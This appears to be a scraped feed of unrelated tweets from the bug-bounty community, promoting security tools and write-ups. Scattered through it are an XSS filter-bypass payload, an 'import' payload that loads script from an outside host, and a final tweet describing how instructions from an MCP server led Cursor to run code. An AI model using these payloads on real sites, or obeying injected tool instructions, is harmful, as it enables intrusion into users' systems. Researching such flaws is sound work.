apuhc

🚨 Governments pay millions for this. Someone just open sourced it for free. It's called Crucix. It watches the entire world. And texts you when something changes. It pulls from 26 live data sources every 15 minutes and renders everything on a single Jarvis-style dashboard. Here's what it watches: → Satellite fire detection (NASA) → Live flight tracking → Radiation monitoring → Conflict zone events → Economic indicators from the Fed → Live market prices, crypto, oil, and commodities → Sanctions lists → Social sentiment from 17 Telegram intelligence channels → Maritime vessel tracking → News from GDELT and RSS feeds Here's what makes this one different: It's two-way. It pushes alerts to your Telegram and Discord. You text it back. Type /brief from your phone and get a full intelligence summary. Type /sweep to force a new scan. It responds like an assistant. It even generates trade ideas based on cross-domain signals. No cloud. No subscription. No telemetry. Runs on your machine. node server.mjs That's it. Your own intelligence terminal. This is the kind of setup that costs six figures behind closed doors. 100% Open Source. MIT License.

You'll never look at your phone again after watching this ‼️‼️

After 5 months of development, I'm releasing EvilWAF v2.4 - a MITM proxy that makes ANY tool bypass WAFs github.com/matrixleons/ev…

github: github.com/sw33tLie/bbsco… website: bbscope.com docs: sw33tlie.github.io/bbscope go install @latest" target="_blank" rel="nofollow noopener">github.com/sw33tLie/bbsco… or docker pull ghcr.io/sw33tlie/bbsco… Contributions/issues welcome. Hope you find it useful!

@elonmusk how about grok? or any other AI model, it will be possible to be 100% controlled?

🤨

Day FOUR of FIVE days of celebrating our 2 year ARCANUM-VERSARY! @arcanuminfosec 5th Giveaway = FOUR seats to our ONE OF A KIND course on using AI to scale you as a Red, Blue, or Purple Teamer: !! Red Blue Purple AI !! 👍 1 Like = 1 Entry! ♻️ 1 Share = 2 Entries! Winners announced 1/21! Syllabus link below 👇

@Behi_Sec @nnwakelam hmm, for sure @zseano

If you had permission to read one person's private bug reports, whose would you choose? I would go for @nnwakelam without a doubt 😃

@NahamSec Bundle 2

Giveaway and new course 🚨 I just released a nuclei course and we have made it a part of our Black Friday bundle. You can get all of our courses for the price of one. 🎁I’ll give some away. All you gotta do is RT & reply with which bundle you want! hhub.io/BugBountyBundl…

@CristiVlad25 - gau (contains the AlienVault's too)

My minimal toolkit for unauthenticated work in bug bounty is: - subfinder (with keys) - httpx - feroxbuster - nuclei (+some priv templates) - wayback (web) What am I missing out on?

Testing for file upload vulnerabilities? 🧐 Check out Malicious PDF Generator, an open-source toolkit to help you generate tens of malicious PDF files designed to exploit various vulnerabilities and insecure features found in PDF readers! 🤠 🔗 github.com/jonaslejon/mal…

#XSS is... JavaScript! youtube.com/watch?v=lkIFF4…

I just published: From Behaviors to Shells: Yii2 PHP Framework RCE | CVE-2024–58136 — Exploit and Mitigation! #BugBounty #RCE #SHELL #bugbountytips medium.com/p/from-behavio…

@inspector_amb @GoogleVRP nice, congrats!

Last year, @GoogleVRP closed a report I submitted as out of scope. I forgot about it. Today, they reassessed it — and just awarded me $50,000 🤯 It's my biggest bounty to date 🥳 Huge thanks to the @GoogleVRP team!

This might trick some #XSS filters out there, including CloudFlare's. <Svg OnLoad="alert//>%0A(1)"

🧵1/5 AI Agents are set to become a $50B industry and take over Web3. They don’t just assist. They trade, build, engage, and scale entire ecosystems. The next bull run won’t be led by tokens. It’ll be led by autonomous AI.

how to create, rename, and teleport between tmux windows like a ninja 👇

Try import('//X55.is') instead of alert(1)

It's never been easier to get pwned combining @cursor_ai auto-run + @AnthropicAI MCP Here is a POC using an external MCP server that parses GitHub repositories documentations turning into RCE. There are 0 AI Guardrails when asking Cursor to follow instructions coming from MCP🙃